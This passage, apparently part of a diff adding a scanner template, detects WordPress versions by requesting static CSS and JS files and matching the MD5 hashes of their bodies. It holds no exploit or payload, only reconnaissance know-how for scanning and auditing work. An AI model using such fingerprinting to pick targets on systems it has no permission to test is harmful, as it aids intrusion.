4.2.2 + dsl: + - "(\"dcaf4f687c6c523cf0e2d5515234faa5\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"aeb3ae0f646c3afc88078de88e318c87\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"4d169faec906ab2d91fb44abce00fd44\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"e0e87cf173989432bb55a610b0482fa7\" == md5(body))" + - type: dsl + name: 3.5 - 3.7.35 + dsl: + - "(\"fa45887a7cdd1c59785925aee26f900c\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"8d1ca3bf59b5e3b0ea34b07e721089ea\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"63f5a605e2f478c7f0c1c1f79a88429d\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"3a144712f35d9aca773bf97d94d5ecaf\" == md5(body))" + - type: dsl + name: 3.1 - 3.1.4 + 
dsl: + - "(\"f5351bd03456d17223b4a5d358b2544a\" == md5(body))" + - type: dsl + name: 3.0 - 3.0.6 + dsl: + - "(\"358cfef8c91e5323297ec1b2ea9cb98b\" == md5(body))" + - type: dsl + name: 2.8.1 - 2.9.2 + dsl: + - "(\"2c8218cfd143404d332975abed1aa569\" == md5(body))" + - type: dsl + name: 2.8 + dsl: + - "(\"581b9ca830642beef916bcd39d089e4b\" == md5(body))" + - type: dsl + name: 2.7 - 2.7.1 + dsl: + - "(\"2abb58f46ab0b5d7d86670731ecf3862\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"9271890ed60cd3e49b8a561767999e4c\" == md5(body))" + - type: dsl + name: 4.9.8 - 4.9.9 + dsl: + - "(\"31b5f0bb77a13841a2812360f12b3ba6\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"de72cf9420ffc4fbef47ecc53877faea\" == md5(body))" + - type: dsl + name: 5.2 - 5.3.6 + dsl: + - "(\"0df88c30eb7ac52b400b1f2121002f91\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"385a8df73ba0f3b70758893a16a6c571\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.1 + dsl: + - "(\"4e3940567475109556544a82ae81ce16\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"2d5ef0d5d3b1951bd406fd6a73a192bc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"51faa672d35571c3c7dc665504c0fee9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-editor/style-rtl.min.css" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4a5dde5e3791a76501821da2b1dfce68\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2820af9602eb1c8443906a9a27d1a819\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"fa9994c1b5de037b9013d1f2ceff882d\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"2bad5ad05fc5e11bac6f5bcf95124a8a\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"fe6ac58ff715c540235e6913dbeb7183\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"0bb01b69a11196ddb298f0d225ccd2c4\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - 
"(\"751c42bf4955e40546dee046ce26b44e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dist/block-editor/style.min.css" + matchers: + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"09927056d95ca371cbd4d7402b352542\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"0e9b74f1a376a273cb1c2c234cba71b0\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a877d2f4353f01a9134d8c8ce0db82b4\" == md5(body))" + - type: dsl + name: 5.5 + dsl: + - "(\"fc060f1d7a3619c63ba1fcba852472e2\" == md5(body))" + - type: dsl + name: 5.5.1 + dsl: + - "(\"2259dc170fd1a6bf64025a9e49f4505f\" == md5(body))" + - type: dsl + name: 5.5.2 - 5.5.3 + dsl: + - "(\"1b58e68c6447fdf5d1eccface0d3070a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9e67d0efd8ef594b12b1f004c6370753\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/admin-bar.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"dc94d328ab5cbcadc8e9ef6519fc067d\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"a2c05aeb1c11f06a8b3c1bc8888714f9\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"aff1e25a4b4a2e2a46ab7ea46d5b9925\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f74a750f829fc22f3527d4f156353d10\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"5f72768681f4c37c485fb8c14f6feb3d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"5a46c32fd25c44db97927a28bcb170b3\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"55285802152cbf7f33740342b5cf5f0e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"86da19a9b131b04a7fe12d38c592ed37\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a433160974de4f9d1cde24cce1c4622c\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"769b39e7aec2b06bb29df3323657c334\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"7d0b6b870a3a7e548e1eb870d88c4c81\" 
== md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"4077bbaddd5b0afec30d0465dfee9a1f\" == md5(body))" + - type: dsl + name: 3.6 - 3.7.35 + dsl: + - "(\"030a9d648605161b8ef79df87680f810\" == md5(body))" + - type: dsl + name: 3.5 - 3.5.2 + dsl: + - "(\"d6d55a8ea4e14a6fdaa3612a728610c9\" == md5(body))" + - type: dsl + name: 3.4 - 3.4.2 + dsl: + - "(\"e7db3dff78abd65e4da012736a676c63\" == md5(body))" + - type: dsl + name: 3.3 - 3.3.3 + dsl: + - "(\"163adcbf68e5c0db8fdf677ea303ec5a\" == md5(body))" + - type: dsl + name: 3.2 - 3.2.1 + dsl: + - "(\"61762f9b3cf69c62702ea3978b8d684f\" == md5(body))" + - type: dsl + name: 3.1.1 - 3.1.4 + dsl: + - "(\"c92591680afc89977dc066e1c372a122\" == md5(body))" + - type: dsl + name: 3.1 + dsl: + - "(\"181250fab3a7e2549a7e7fa21c2e6079\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"9ea3eba803004cf0fd6fa54f113fc2eb\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"d4848bf7a74b8f06572006f03b22d8df\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.2 + dsl: + - "(\"7d543e6dd3df8e177a96af4edd405cd4\" == md5(body))" + - type: dsl + name: 5.2.3 - 5.2.9 + dsl: + - "(\"5dce0296f703eff6dbf67e7ed1222938\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"84cc3efbc68b9c92cca44a90175faae2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"caa38ff10ed1507e35313b9a72f66c22\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2a85ae0041f1e0eb49d4a7774808e79a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menus.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"26316cf9639d7b0deeb5e123ffe79a5c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"5fc6ab945e28c3ec1018d27359fc6fe0\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"86d3b37483ebfc6abed73502569760c7\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"5f236bd826c48e91ff253382c5c37aa1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + 
dsl: + - "(\"c3363dc9b45a2e183ff4743110e0649c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"0f976bf7efaf94fab3099a544671bf06\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"d3266344ddb105a2e774a071dd05a361\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"d314bef52d4210718abf723a84c0db97\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"4e458ab9194119cf29d195398952278e\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6a34c3bf655032a55972f1acb0deedda\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"ee11d0961a70a281fffdd478bab3db99\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"03fe2a02684af9dd3c05d206434700ee\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"eff1f0418baf497fee10aa9421cc7766\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.1.8 + dsl: + - "(\"d9fd1cc345d88a5f0d0ae8ed7b5ffe0d\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"aaa89661c610c9d3be7bf098cbd81d9d\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"942abacb51c51c46a7b2eab718b50ff4\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"a87557e7840940783e60c7877e2a1799\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"ee7b6faa39b4daacb9803c8f28f3e07a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"944fa1911d43313855e89ef1a548fe59\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menus.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"d6fc2524d57ebc083b7ff7537e224da0\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"f236f953d732ffea81874f232246a427\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"bc513df8fca4987536f8469d24b211ea\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"5bc61e4d6b4a02f424ab9f4847627294\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - 
"(\"44049d0e74af137633cef06a3d528c2a\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"c23ed53f65d2a33b09841652d534cc5d\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"dd459e1742a3926a3675f688d0ef92da\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"4755410b4d7c1cd67fa2dc22c02366e7\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.1.8 + dsl: + - "(\"cb3f33976b5285736dc20089d664cad7\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"aef837640e1f39eb578e3bb898e3fe2c\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"422e9259e974a8b75dc5ced61527a267\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"8aaac8c45315f80ce0f534516d595f7f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"30620103fe7264b628191d45ba5cc39c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8dd847f3f9e6dd3b55c7116fbb88ed5e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menus-rtl.min.css" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"b66d358a3f46de1f57cbee6e570e934c\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"985b33c3a44691c0e59b3b40dd5df611\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"e8e736e802c339955e0473f66df03997\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"cf3c105be573bef08e81acc2005563bc\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"bbd4cf6151b6cb6aef0069f21c974bd1\" == md5(body))" + - type: dsl + name: 4.9.5 - 4.9.16 + dsl: + - "(\"b83ae3ac7bf56384bccae35bd754330f\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"48d54770a01d9bfda2cf1d474fe33ce8\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"426ba484cd1e0d2f58f8c4abd314ced8\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.1.8 + dsl: + - "(\"93a88efe33eee0f63d3514a8523c50e2\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"aca80e48284d65eb3bfa545286c6bb93\" == 
md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"6c820a224fb1b62424c77cefc7f61f1a\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"043de378600b0c2ac4125573d8099a48\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"a7677a0b2c154416be1bb8cedf4ac135\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"832d0ae59a42ef007ab959fc5a9847ad\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/tinymce/tinymce.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"86265897eb6b6dd76f6d2a0a90c8420e\" == md5(body))" + - type: dsl + name: 4.7.4 - 4.7.19 + dsl: + - "(\"8f1e10e7c01e44db33c5003d897eaf85\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.3 + dsl: + - "(\"bb16520a021ae170a7019675f2f5f81f\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"7d3d06f33331b3a08222df679ab2c8fe\" == md5(body))" + - type: dsl + name: 4.5.1 - 4.5.23 + dsl: + - "(\"a2ec23124a2989f2a773d65ad1bdf37d\" == md5(body))" + - type: dsl + name: 4.5 + dsl: + - "(\"bae0e7d1036a75aeaed6461677f39adc\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"36fb296e63f7d054a7695d40916004f9\" == md5(body))" + - type: dsl + name: 4.3.1 - 4.3.25 + dsl: + - "(\"8dbe59343ccc14e1c3be2204e4c68c6a\" == md5(body))" + - type: dsl + name: 4.3 + dsl: + - "(\"7fd549b2340d5da4b05e27f16655ce3c\" == md5(body))" + - type: dsl + name: 4.2.2 - 4.2.29 + dsl: + - "(\"df2f5a1e56af39b9ec1b4e2e7bf6d08b\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"a1410c5a4e18cf08544136bcf0fbfddd\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"f3b51c46d7be402a753613d97c68cfd0\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"b6c6f8d469f55960e57d0a268adb3601\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f2ddb16f20361a33a873d2516fc90686\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.2 + dsl: + - "(\"db400ecef923dd0e45a03a8efe9e024e\" == md5(body))" + - type: dsl + 
name: 4.9.3 - 4.9.5 + dsl: + - "(\"cc1033054aede513d5bb550bf85ecc6e\" == md5(body))" + - type: dsl + name: 4.9.6 - 4.9.7 + dsl: + - "(\"ad598feb4b2b6ce0c38d86f89d2f3970\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"e0cc75e46e7be9cda3c4da2a12e6e2f2\" == md5(body))" + - type: dsl + name: 5.1 - 5.2 + dsl: + - "(\"500c07cb726ab6a03c8cfd154414e9d7\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"40b86d22b39ba7ebb195a9fe7d10ff28\" == md5(body))" + - type: dsl + name: 5.3 - 5.4.4 + dsl: + - "(\"f89b18422c3a2b2e95315dd5b7eabe8e\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"2476454ed291bdd96a14c4b7f08ab5bc\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"586ce1e095c0f8b0cca1439fcefe6b6e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dashicons.min.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"cf3c0e8f26fe2025a0f22138ffe30d53\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"5f672f4380c60d6d7d67604e55aa0e7b\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"e65f96d4f5227b3b03c118b731b6f921\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"5515b659e6fa1b563d7d57287dea2e4e\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"519c5cad73fa9de0f11b7e78479e7599\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"c659db821f14019f9974e62313535cfa\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"3b6d61cac9d02c4ee20bb87f5caab26e\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"515214365da656a845777ddbdc04ee2a\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"c2566febd39864bf4abe0ebebd0f147d\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"1c364e777cd2b874ea6cf09100861c6c\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"800e28274109388380449140e310f8bb\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - 
"(\"abe89a302a6cd8111574788f7cd3a0d7\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.4.4 + dsl: + - "(\"c8956481e00463f838b45364f45756df\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d2678bbfdb083928cabb16f0b85d0f1c\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d5e6ce5103b482fe0a2d355d003e9ffd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/dashicons.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"cbd78303f0ab99bcf4470575b0f8a7ea\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"091c14c103750ded6e7ded49df51a98d\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"a6907bc29f0d2dcf9a44bf4a56bceca4\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"7d009b6317b016a7d127de92c3a0c905\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"b3cf8e531a9c15bb7952877a43a5cd64\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"a5cc9931638552cae57f9c701fd8f776\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"6a5c4ff8a9f11b2344e05fe1318ac520\" == md5(body))" + - type: dsl + name: 3.8.1 - 3.8.35 + dsl: + - "(\"cf2aec29e53cf7fcfeed958de2b1aec7\" == md5(body))" + - type: dsl + name: 3.8 + dsl: + - "(\"7764b220df0d9356ec51b6946533c7ac\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"5d6b5071186dbd3e8af754f6a013ba18\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"363ed44b087adae1c3fd9231f8fe79d2\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"def33a673e34fac8f0b6df1cf4a6c5df\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.4.4 + dsl: + - "(\"aceacf5c4e3295d6dbab9118d672d1e4\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4b20f5f54d861ef753f71d48e39e3f80\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"2c4af0bbdf2fb60fc46ee752e4bb7ee9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/nav-menus-rtl.css" + matchers: + - type: 
dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"71e4ef8ec8da9599e176043a5d31e025\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"63af64ba89f768e448bab87ee0cb94da\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"acc2861152c365bbafbfff8ab3baaf55\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"977215a7d6324e9bbd607305187355a1\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"84d2cdacbe7a308bea0ed482fc236bb7\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"ced8cb7d002258e5a711cc0e610b3cf0\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"91ff408d32eacbd28e621c34b7565f8d\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"02cb4a48791d540267d3f1bdc7b25a8f\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"75344ea8409de819ebc101366c402c11\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"f840b18a792635481d3a0e5b8ff55612\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.4 + dsl: + - "(\"745ae83cdb88166b48e13f879c600ff7\" == md5(body))" + - type: dsl + name: 4.9.5 - 5.0.11 + dsl: + - "(\"6583418c9dfc4767fd8df8059be75015\" == md5(body))" + - type: dsl + name: 5.1 + dsl: + - "(\"8488283c909d6b599b0bfc4135c8c885\" == md5(body))" + - type: dsl + name: 5.1.1 - 5.1.8 + dsl: + - "(\"2666a090dd22c66ad83fa1ed000a068a\" == md5(body))" + - type: dsl + name: 5.2 + dsl: + - "(\"522e0398389b0db63783a3d8d35dd002\" == md5(body))" + - type: dsl + name: 5.2.1 - 5.2.9 + dsl: + - "(\"c5e41c8c4080a281258cba02483eacd2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"edc470548ca17c52be8c94f6fc8b6c86\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"6f9db94ed589ac53ac4f95f7bfd46157\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3ce0fdd54d7109ff5ba425d88509c06b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"e3da39b7d64c16ecb4298e483a7c2a74\" == md5(body))" + - method: GET + path: + - 
"{{BaseURL}}/wp-admin/css/site-health-rtl.css" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"19991d9e26681ff01629a0cf58651bae\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"7592e3eb7de71932226882365aa3819f\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"e66fa0b23640d556008829f69c9a2d16\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"27c646e3c3864f931729676695034395\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9bf7afac2006b8184971c08d3d246f7c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"cc0cc3c4152cc9d4d7b17d2ae725f02f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"452f6383f0d9263dda6b0d5ea88a6db9\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-health-rtl.min.css" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"14f7a6c96c22eef6f02fa918f7c8b6e2\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"2d2ae0d8ae344824615e599729f5ea36\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"ed8b548ceed11d315604c72a57972503\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"c61f97d295efa7b259a1c31ed539a06c\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"15345e2225ade03956ab276155af29e6\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"0b7dcfb8747c7e5e73feea29e6c4b76d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b5ae779b1a5499ec7b6cb2b41d3f7e63\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-health.css" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"a815a72dc9c0594be5aaf9cf1b9ce464\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"5eb3454daf100e4be230440daa329ae6\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"c1f0b9a047b6061761580ef3ee214089\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f8ae37763a8ce5880c9b2eb6846ff309\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + 
dsl: + - "(\"1539b98902afecd3a677150c6be08723\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6a418be61b03da0ba6d7d5c08311f531\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"244c9df5b8da8e654172b69d05eafed3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/site-health.min.css" + matchers: + - type: dsl + name: 5.2 + dsl: + - "(\"b875bcda0ce59674010c90917c167595\" == md5(body))" + - type: dsl + name: 5.2.1 + dsl: + - "(\"69c4f2948081065924089d12e39b1a0a\" == md5(body))" + - type: dsl + name: 5.2.2 - 5.2.9 + dsl: + - "(\"33fb80d8f91159c6b8b86fb219bc4fa8\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"a64377bb1095c77534632279ece6c742\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"3746073895dac1541ea0fd7bbd0e3501\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6e75baa8fa43d1a0850c08805314d8c9\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"8ff63629a11bdd97ced82973fcab7562\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/wp-emoji-release.min.js" + matchers: + - type: dsl + name: 4.8.2 - 4.9.2 + dsl: + - "(\"af2f44df3198cfda9fd515873696ad00\" == md5(body))" + - type: dsl + name: 4.8 - 4.8.1 + dsl: + - "(\"8b90a6e26cce1c0a39bfa8b7e0fe909e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"cb6284b70da03a43468244be7eafa362\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"64d7608a1b81f07f97f87506b87a8a5a\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"f3789112e7c443dc1d661159005af3e4\" == md5(body))" + - type: dsl + name: 4.4.3 - 4.4.24 + dsl: + - "(\"b22ca0bb06142d867f03bd0d89642997\" == md5(body))" + - type: dsl + name: 4.4.1 - 4.4.2 + dsl: + - "(\"3f19e615bd0d76b9f3457d0f44d5211b\" == md5(body))" + - type: dsl + name: 4.4 + dsl: + - "(\"1601e8da361dc8f86caa5afe88e37f5c\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"1c64b125732c6fe54928ee058ea72595\" == md5(body))" 
+ - type: dsl + name: 4.2.3 - 4.2.29 + dsl: + - "(\"5976e0125334346c7a6211dd341db80e\" == md5(body))" + - type: dsl + name: 4.2.2 + dsl: + - "(\"c2e58e292752044c979a4efe494e1299\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.1 + dsl: + - "(\"ea188c2a9a5622ddd0451da92900799d\" == md5(body))" + - type: dsl + name: 4.9.3 - 4.9.7 + dsl: + - "(\"a7c259ac67b3b4002dc8ac4a09765b9d\" == md5(body))" + - type: dsl + name: 4.9.8 - 5.0.11 + dsl: + - "(\"15d0c302dc74fd87bd9cfeab513e13e4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c17b309d8ab4b4e9653876d3c35c397d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"fd997843190935059fe09163ecf229a5\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"b2bdc6d8dfd107ed138f042d71ad4be2\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ec33f485ba2d4767dae9d112b78f8b02\" == 